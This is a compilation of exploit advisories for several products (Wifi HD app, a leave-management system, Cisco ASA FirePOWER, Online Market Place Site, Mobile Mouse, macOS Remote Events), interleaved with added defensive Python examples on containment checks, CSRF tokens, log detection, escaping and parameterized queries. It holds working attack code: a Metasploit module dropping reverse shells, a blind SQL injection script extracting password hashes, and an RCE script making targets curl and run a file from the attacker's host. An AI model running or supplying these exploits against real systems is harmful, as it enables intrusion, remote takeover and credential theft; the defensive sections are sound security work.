<pre><code># Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion<br /># Date: Aug 13, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: http://www.savysoda.com<br /># Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976<br /># Version: 11<br /># Tested on: iPhone OS 15_5<br /><br />GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1<br />Host: 192.168.1.100<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1<br />Referer: http://192.168.1.103/<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br /><br />-----------------<br /><br />HTTP/1.1 200 OK<br />Content-Disposition: attachment<br />Content-Type: application/download<br />Content-Length: 213<br />Accept-Ranges: bytes<br />Date: Sat, 13 Aug 2022 03:33:30 GMT<br /><br />##<br /># Host Database<br />#<br /># localhost is used to configure the loopback interface<br /># when the system is booting. Do not change this entry.<br />##<br />127.0.0.1 localhost<br />255.255.255.255 broadcasthost<br />::1 localhost<br /></code></pre>
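The request above works because the app's embedded web server joins the request path onto its share directory without confining the result. The following is an added example, not part of the advisory and not code from the Wifi HD app: it shows the containment check a file-serving handler needs (decode, normalize, then verify the resolved path is still under the document root) and a small access-log scan that flags requests failing that check. The document root, the log format and the log lines are constructed for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed document root; the app's real share directory is not known from the advisory.
DOC_ROOT = "/srv/share"


def resolve_request_path(doc_root, request_target):
    """Map an HTTP request-target onto a file path under doc_root.

    Returns the resolved absolute path, or None when the request would escape
    doc_root. Percent-decoding is repeated until stable so that encoded and
    double-encoded dot segments are normalized before the containment check.
    """
    path = request_target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if "\x00" in path:                      # NUL would truncate the path in C-level file APIs
        return None
    path = path.replace("\\", "/")          # treat backslashes as separators as well
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    # normpath has collapsed every "..": the result must still sit at or below root
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed access-log lines in Common Log Format (hypothetical; the app's own log format is unknown).
SAMPLE_ACCESS_LOG = [
    '192.168.1.103 - - [13/Aug/2022:03:33:30 +0000] "GET /../../../../etc/hosts HTTP/1.1" 200 213',
    '192.168.1.103 - - [13/Aug/2022:03:34:01 +0000] "GET /photos/IMG_0001.jpg HTTP/1.1" 200 58212',
    '192.168.1.103 - - [13/Aug/2022:03:35:12 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)$')


def find_traversal_attempts(lines, doc_root=DOC_ROOT):
    """Return one record per log line whose request-target escapes doc_root.

    'served' is True when the server answered 200, i.e. the file was likely disclosed.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, method, target, status, _size = m.groups()
        if resolve_request_path(doc_root, target) is None:
            hits.append({"client": client, "time": when, "method": method,
                         "target": target, "status": int(status), "served": status == "200"})
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_ACCESS_LOG):
        print(hit)
```

The check is done on the decoded, normalized string; a server that follows symlinks should additionally compare `os.path.realpath()` of the candidate against the real path of the root before opening the file.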
<pre><code># Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)<br /># Date: 05/09/2022<br /># Exploit Author: Amolo Hunters<br /># Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)<br /><br />Summary:<br />================<br />The Online Employee Leave Management System is vulnerable to Cross-Site Request Forgery in addemployee.php, the page used to add employees with administrative privileges. Because the application does not protect this request against CSRF, an attacker can forge it on behalf of a logged-in administrator, leading to the creation of a new account with administrative privileges.<br /><br />Severity Level:<br />================<br />5.4 (Medium)<br />CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N<br /><br />Affected Product:<br />================<br />Online Employee Leave Management System v1.0<br /><br />Steps to Reproduce:<br />================<br /><br />1. Create an HTML file and paste the following code:<br /><br /><html><br /><title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title><br /><center><br /><h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1><br /><p>by Amolo Hunters</p><br /><form action="http://target.com/elms/admin/addemployee.php" method="POST"><br /><input type="hidden" name="empcode" value="1337" /><br /><input type="hidden" name="firstName" value="AmoloHT" /><br /><input type="hidden" name="lastName" value="PoC" /><br /><input type="hidden" name="email" value="amoloht@poc.com" /><br /><input type="hidden" name="password" value="hacker123" /><br /><input type="hidden" name="confirmpassword" value="hacker123" /><br /><input type="hidden" name="gender" value="Other" /><br /><input type="hidden" name="dob" value="3 June, 2022" /><br /><input type="hidden" name="department" value="Information Technology" /><br /><input type="hidden" name="country" value="Brazil" /><br /><input type="hidden" name="city" value="PoC" /><br /><input type="hidden" name="address" value="PoC" /><br /><input type="hidden" name="mobileno" value="0000000000" /><br /><input type="hidden" name="add" value="" /><br /><input type="submit" value="Submit request" /><br /></form><br /></center><br /></html><br /><br />2. Save the file and open it in the browser.<br />Note: you need to be logged in as an administrator.<br /></code></pre>
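The PoC succeeds because addemployee.php accepts any POST that arrives with the administrator's session cookie. The following is an added example, not part of the advisory and not the application's code: it shows the two server-side checks that stop this request, a session-bound synchronizer token verified with a constant-time compare, and an Origin/Referer check that fails closed. The secret key, session id and the request dictionaries are constructed; the forged request carries exactly the form fields of the PoC above.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Constructed per-deployment secret; a real application loads this from configuration.
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Mint a token bound to the admin's session (synchronizer-token pattern, HMAC-based)."""
    nonce = secrets.token_hex(16)
    tag = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{tag}"


def verify_csrf_token(session_id, token):
    """True only if the token was minted for this session and has not been altered."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, tag = token.split(".", 1)
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)


def request_is_same_site(headers, site_host):
    """Browsers send Origin on cross-site POSTs; require it (or Referer) to name our own host."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False   # fail closed: a state-changing request with no source header is rejected
    return urlparse(source).hostname == site_host


def accept_add_employee(request, session_id, site_host="target.com"):
    """Decide whether a POST to addemployee.php may be acted on. Returns (accepted, reason)."""
    if request["method"] != "POST":
        return False, "method"
    if not request_is_same_site(request["headers"], site_host):
        return False, "origin"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return False, "token"
    return True, "ok"


# Constructed requests. FORGED carries the PoC's form fields, submitted from another site
# while the admin's session cookie rides along automatically.
POC_FIELDS = {"empcode": "1337", "firstName": "AmoloHT", "lastName": "PoC",
              "email": "amoloht@poc.com", "password": "hacker123", "confirmpassword": "hacker123",
              "gender": "Other", "dob": "3 June, 2022", "department": "Information Technology",
              "country": "Brazil", "city": "PoC", "address": "PoC", "mobileno": "0000000000", "add": ""}
ADMIN_SESSION = "sess-constructed-1"
FORGED = {"method": "POST", "headers": {"Origin": "http://attacker.example"}, "form": dict(POC_FIELDS)}
FORGED_NO_ORIGIN = {"method": "POST", "headers": {}, "form": dict(POC_FIELDS)}
SAME_SITE_NO_TOKEN = {"method": "POST", "headers": {"Origin": "http://target.com"}, "form": dict(POC_FIELDS)}
LEGIT = {"method": "POST", "headers": {"Origin": "http://target.com"},
         "form": dict(POC_FIELDS, csrf_token=issue_csrf_token(ADMIN_SESSION))}

if __name__ == "__main__":
    for name, req in [("forged", FORGED), ("forged, no Origin", FORGED_NO_ORIGIN),
                      ("same-site, no token", SAME_SITE_NO_TOKEN), ("legitimate", LEGIT)]:
        print(f"{name:22s} -> {accept_add_employee(req, ADMIN_SESSION)}")
```

The token must be emitted into the real add-employee form and must never be readable cross-site; the origin check is a second, independent layer because some proxies strip Referer.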
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an authenticated command injection vulnerability affecting<br /> Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's<br /> ASDM web server and lands in the FirePower Services SFR module's Linux virtual<br /> machine as the root user. Access to the virtual machine allows the attacker to<br /> pivot to the inside network, and access the outside network. Also, the SFR<br /> virtual machine is running snort on the traffic flowing through the ASA, so<br /> the attacker should have access to this diverted traffic as well.<br /><br /> This module requires ASDM credentials in order to traverse the ASDM interface.<br /> A similar attack can be performed via Cisco CLI (over SSH), although that isn't<br /> implemented here.<br /><br /> Finally, it's worth noting that this attack bypasses the affects of the<br /> `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be<br /> available but this attack makes it available).<br /><br /> Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that<br /> support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,<br /> and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module<br /> versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. 
The following versions will<br /> receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'jbaines-r7' # Vulnerability discovery and Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2022-20828' ],<br /> [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ],<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ],<br /> [ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html']<br /> ],<br /> 'DisclosureDate' => '2022-06-22',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64,],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Shell Dropper',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => ARCH_X64,<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'curl', 'wget' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'Username to authenticate with', '']),<br /> OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br 
/> 'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'),<br /> 'headers' =><br /> {<br /> 'User-Agent' => 'ASDM/ Java/1',<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /> })<br /> return CheckCode::Unknown('The target did not respond to the check.') unless res<br /> return CheckCode::Safe('Authentication failed.') if res.code == 401<br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /><br /> if res.body.include?('Invalid do command uid=0(root)')<br /> return CheckCode::Vulnerable("Successfully executed the 'id' command.")<br /> end<br /><br /> CheckCode::Safe('The command injection does not appear to work.')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # base64 encode the payload to work around bad characters and then uri encode<br /> # the whole thing before yeeting it at the server<br /> encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"),<br /> 'headers' =><br /> {<br /> 'User-Agent' => 'ASDM/ Java/1',<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /> })<br /><br /> # a nil response is deliberately not fatal here (see the session check below)<br /> if res<br /> fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401<br /> fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /> end<br /><br /> if session_created?<br /> # technically speaking, bash can hold the connection open and skip all the res checks<br /> # also passing the res checks doesn't actually mean that the target was exploited so<br /> # check a session was created to get verification<br /> print_good('Session created!')<br /> else<br /> fail_with(Failure::NotVulnerable, 'The exploit was thrown but no session was created.')<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
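Both the check and the exploit in the module above reach the ASA through the ASDM `/admin/exec/` handler with a `session sfr do <arg>` command whose argument contains backticks, and they identify themselves with the `ASDM/ Java/1` User-Agent. That is a narrow, loggable shape, so the following is an added example, not part of the module or of Cisco's software: a detector that URL-decodes `/admin/exec/` requests, recovers the CLI command, and flags `session sfr do` invocations whose argument carries shell metacharacters. The log format and the sample lines are constructed (the field layout is hypothetical; adapt `LOG_RE` to the real source, e.g. a reverse proxy or ASA syslog in front of ASDM).

```python
import re
from urllib.parse import unquote_plus

EXEC_PREFIX = "/admin/exec/"
# metacharacters that let a "session sfr do" argument escape into a shell
SHELL_META = re.compile(r"[`;&|]|\$\(|<<<")


def decode_exec_command(request_target):
    """Return the ASA CLI command carried by an ASDM /admin/exec/ request, or None."""
    path = request_target.split("?", 1)[0]
    if not path.startswith(EXEC_PREFIX):
        return None
    # ASDM encodes spaces as '+' and other bytes as %XX
    return unquote_plus(path[len(EXEC_PREFIX):])


def classify_exec_command(command):
    """Label a CLI command reached through ASDM:
    'sfr_do_injection'  session sfr do ... with shell metacharacters in the argument
    'sfr_do'            session sfr do ... with a plain argument
    'other'             any other command
    """
    parts = command.split(None, 3)
    if len(parts) == 4 and parts[:3] == ["session", "sfr", "do"]:
        return "sfr_do_injection" if SHELL_META.search(parts[3]) else "sfr_do"
    return "other"


# Constructed log lines: client user "request" status "user-agent" (hypothetical format).
SAMPLE_LOG = [
    '10.0.0.5 admin "GET /admin/exec/show+version HTTP/1.1" 200 "ASDM/ Java/1"',
    '10.0.0.5 admin "GET /admin/exec/session+sfr+do+%60id%60 HTTP/1.1" 200 "ASDM/ Java/1"',
    '10.0.0.9 admin "GET /admin/exec/session+sfr+do+show+version HTTP/1.1" 200 "ASDM/ Java/1"',
    '10.0.0.5 - "GET /admin/login HTTP/1.1" 401 "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(\S+) (\S+) "(?:GET|POST) (\S+) HTTP/[0-9.]+" (\d{3}) "([^"]*)"$')


def find_sfr_injections(lines):
    """Return one record per log line whose request is a session sfr do injection."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, user, target, status, agent = m.groups()
        command = decode_exec_command(target)
        if command is None:
            continue
        if classify_exec_command(command) == "sfr_do_injection":
            findings.append({"client": client, "user": user, "command": command,
                             "status": int(status), "user_agent": agent})
    return findings


if __name__ == "__main__":
    for finding in find_sfr_injections(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 from an authenticated ASDM user is worth treating as a credential-compromise investigation, since the module requires valid ASDM credentials; the patched FirePOWER module versions named in the description remove the underlying injection.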
<pre><code># Exploit Title: Online Market Place Site v1.0 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: Joe Pollock<br /># Date: September 03, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: CVE-2022-30003 (RESERVED)<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description:<br /># Online Market Place Site v1.0 suffers from an authenticated stored Cross-Site Scripting (XSS) vulnerability allowing attackers to register<br /># as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.<br /><br />To reproduce:<br /><br />1. Sign in as a Seller (or create an account), then add a product by navigating to 'Products' > 'Add New'.<br /><br />2. Add an XSS payload (e.g. <script>alert(1)</script>) within the 'Product Title' and/or 'Short Description' fields.<br /><br />3. Click 'SAVE' - the XSS payload(s) will be executed immediately or any time the product is viewed.<br /></code></pre>
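The fields are stored and later written into product pages without output encoding. The following is an added example, not part of the advisory and not the application's PHP: it contrasts the unescaped rendering that reproduces the bug with the escaped rendering that fixes it, for both element content (the product card) and an attribute value (an edit form), and uses the standard library's HTML parser to show which version still contains something a browser would execute. The markup fragments and payload strings are constructed.

```python
import html
from html.parser import HTMLParser


def render_product_card(title, short_description):
    """Rendering pattern behind the advisory: seller-supplied fields dropped straight into HTML."""
    return f'<div class="product"><h3>{title}</h3><p>{short_description}</p></div>'


def render_product_card_escaped(title, short_description):
    """Fix: HTML-escape each untrusted field at the point of output (element content)."""
    return (f'<div class="product"><h3>{html.escape(title)}</h3>'
            f'<p>{html.escape(short_description)}</p></div>')


def render_edit_form(title):
    """Attribute context (e.g. a product edit form): quotes must be escaped as well."""
    return f'<input name="title" value="{html.escape(title, quote=True)}">'


class ActiveContentFinder(HTMLParser):
    """Parses rendered HTML and records anything a browser would execute as script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"{name} with javascript: URL")


def active_content(rendered_html):
    """Return the list of executable constructs found in rendered_html (empty when inert)."""
    finder = ActiveContentFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.findings


# Constructed payloads: the advisory's <script> probe and an attribute-breakout variant.
SCRIPT_PAYLOAD = "<script>alert(1)</script>"
ATTRIBUTE_PAYLOAD = '" onfocus="alert(1)'

if __name__ == "__main__":
    print("unescaped card :", active_content(render_product_card(SCRIPT_PAYLOAD, "ok")))
    print("escaped card   :", active_content(render_product_card_escaped(SCRIPT_PAYLOAD, "ok")))
    print("unescaped input:", active_content(f'<input name="title" value="{ATTRIBUTE_PAYLOAD}">'))
    print("escaped input  :", active_content(render_edit_form(ATTRIBUTE_PAYLOAD)))
```

Escaping at output time is the fix; an input filter that merely strips `<script>` leaves the attribute case above intact, which is why the parser-based check is run on the rendered page rather than on the stored field.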
<pre><code># Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection<br /># Exploit Author: Joe Pollock<br /># Date: September 03, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: CVE-2022-30004 (RESERVED)<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description:<br /># Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.<br /># This script will retrieve a single username and associated password hash from the omps_db database via blind, time-based SQL injection.<br /># By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.<br /># Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.<br /># Ex: python3 omps.py 10.14.14.2<br />import sys, requests, urllib3<br />USERID=0<br /><br />def main():<br /> if len(sys.argv) != 2:<br /> print("(+) usage: %s <target>" % sys.argv[0])<br /> print("(+) eg: %s 192.168.121.103" % sys.argv[0])<br /> sys.exit(-1)<br /> ip = sys.argv[1]<br /> print("(+) Retrieving username and hash...")<br /> target = "http://%s/omps/classes/Users.php?f=save_user" % ip<br /> <br /> # Get username<br /> for p in range(1, 30):<br /> injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)<br /> for c in range(32, 126):<br /> files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}<br /> #print(injection_string.replace("[CHAR]", str(c)))<br /> r = requests.post(target, files=files)<br /> if (r.elapsed.total_seconds() > 2):<br /> extracted_char = chr(c)<br /> sys.stdout.write(extracted_char)<br /> sys.stdout.flush()<br /> sys.stdout.write("\t")<br /> <br /> # Get password hash<br /> for p in range(1, 65):<br /> injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)<br /> for c in range(32, 126):<br /> files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}<br /> #print(injection_string.replace("[CHAR]", str(c)))<br /> r = requests.post(target, files=files)<br /> if (r.elapsed.total_seconds() > 2):<br /> extracted_char = chr(c)<br /> sys.stdout.write(extracted_char)<br /> sys.stdout.flush()<br /> print("\n(+) done!")<br /> <br />if __name__ == "__main__":<br /> main()<br /></code></pre>
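The script works because `save_user` splices the `username` field into its SQL text, so a closing quote followed by `OR IF(..., sleep(1), 0)` becomes part of the query and the response time leaks one character per request. The following is an added example, not part of the advisory and not the application's PHP: it reproduces the concatenation flaw and the parameterized fix side by side on an in-memory SQLite table standing in for `omps_db.users`, and shows that under the fix the same input is treated as an ordinary string. The table contents and the two payload strings are constructed; `IF()` and `sleep()` are MySQL functions that SQLite lacks, which is used here to show that the concatenated query hands the input to the SQL parser while the bound parameter never does.

```python
import sqlite3


def make_db():
    """Constructed stand-in for omps_db.users (the real target runs MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "<hash-placeholder-1>"), ("seller1", "<hash-placeholder-2>")])
    return conn


def username_exists_vulnerable(conn, username):
    """The flaw behind save_user: the request field is concatenated into the SQL text."""
    sql = "SELECT COUNT(*) FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone()[0] > 0


def username_exists_safe(conn, username):
    """Same lookup with a bound parameter: the field is data, never SQL."""
    row = conn.execute("SELECT COUNT(*) FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] > 0


def vulnerable_query_error(conn, username):
    """Return the database error the concatenated query raises for this input, or None."""
    try:
        username_exists_vulnerable(conn, username)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


# Constructed inputs. The first closes the string literal and appends an always-true condition;
# the second has the shape of the advisory's time-based probe.
BOOLEAN_PAYLOAD = "AAAA' OR '1'='1' -- -"
TIMING_PAYLOAD = "AAAA' OR IF(1=1,sleep(1),0)-- -"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, boolean payload:", username_exists_vulnerable(db, BOOLEAN_PAYLOAD))
    print("safe, boolean payload      :", username_exists_safe(db, BOOLEAN_PAYLOAD))
    print("vulnerable, timing payload :", vulnerable_query_error(db, TIMING_PAYLOAD))
    print("safe, timing payload       :", username_exists_safe(db, TIMING_PAYLOAD))
```

On the vulnerable path the boolean payload matches every row and the timing payload reaches the SQL parser (on MySQL it would sleep); on the parameterized path both are simply usernames that do not exist. A request-level signal for the advisory's technique is a burst of POSTs to `Users.php?f=save_user` whose response times cluster at the `sleep()` interval.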
<pre><code># Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution<br /># Date: Aug 09, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://mobilemouse.com/<br /># Software Link: https://www.mobilemouse.com/downloads/setup.exe<br /># Version: 3.6.0.4<br /># Tested on: Windows 10 Enterprise LTSC Build 17763<br /><br />#!/usr/bin/env python3<br /><br />import socket<br />from time import sleep<br />import argparse<br /><br />help = " Mobile Mouse 3.6.0.4 Remote Code Execution "<br />parser = argparse.ArgumentParser(description=help)<br />parser.add_argument("--target", help="Target IP", required=True)<br />parser.add_argument("--file", help="File name to Upload")<br />parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")<br /><br />args = parser.parse_args()<br /><br />host = args.target<br />command_shell = args.file<br />lhost = args.lhost<br />port = 9099 # Default Port<br /><br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />s.connect((host, port))<br /><br />CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")<br />s.send(CONN)<br />run = s.recv(54)<br /><br />RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")<br />s.send(RUN)<br />run = s.recv(54)<br /><br />sleep(0.5)<br /><br />download_string = f"curl http://{lhost}:8080/{command_shell} -o c:\\Windows\\Temp\\{command_shell}".encode('utf-8')<br />hex_shell = download_string.hex()<br />SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04")<br />s.send(SHELL)<br />shell = s.recv(96)<br /><br />print("Executing The Command Shell...")<br />sleep(5)<br />RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")<br />s.send(RUN2)<br />run2 = s.recv(54)<br />sleep(0.8)<br />shell_string = f"c:\\Windows\\Temp\\{command_shell}".encode('utf-8')<br />hex_run = shell_string.hex()<br />RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04")<br />s.send(RUN3)<br />run3 = s.recv(96)<br /><br />print(" Take The Rose")<br /><br />sleep(50)<br />s.close()<br /></code></pre>
<pre><code>#!/usr/bin/env python<br /># -*- coding: UTF-8 -*-<br />#<br /># naval.py<br />#<br /># Apple macOS Remote Events Remote Memory Corruption Vulnerability<br />#<br /># Jeremy Brown [jbrown3264/gmail]<br />#<br /># =====<br /># Intro<br /># =====<br />#<br /># [eppc] Hello from AEServer<br />#<br /># Remote Apple Events is a core service and remote system administration and automation<br /># tool for Macs. It can be enabled via System Preferences -> Sharing and listens on<br /># port tcp/3031 and may be used in enterprise environments for remote administration.<br /># Sending malformed packets triggers a crash in the AEServer binary which may allow for<br /># arbitrary code execution on the remote machine within the context of the _eppc user.<br /># However, the crash is subtle as the service is automatically restarted and only a log<br /># in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.<br />#<br /># Although a controlled, reliable crash at an arbitrary location is difficult, it was<br /># eventually achieved during testing with repeated characters in packets during sessions.<br />#<br /># Thread 0 crashed with X86 Thread State (64-bit):<br /># rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370<br /># rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8<br /># r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0<br /># r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218<br /># rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260<br />#<br /># While debugging it looks like the process is crashing when trying to release or<br /># dereference memory that has been deallocated, likely a sign of a heap related bug<br /># such as a use-after-free bug.<br />#<br /># This code serves as a toolkit to help debug and trigger crashes, 
